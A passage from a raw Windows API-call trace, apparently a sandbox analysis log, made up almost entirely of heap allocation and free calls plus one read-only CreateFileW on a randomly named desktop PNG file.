0x43cfab8 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0120.166] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0120.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0120.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.169] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0120.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca850, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0120.171] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\A2BeonpxV2cn0bIC.png" (normalized: "c:\\users\\fd1hvy\\desktop\\a2beonpxv2cn0bic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea490 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0120.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0120.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0120.172] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.173] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0120.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0120.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.173] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0120.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0120.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0120.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0120.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0120.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.174] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0120.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0120.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392688 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: 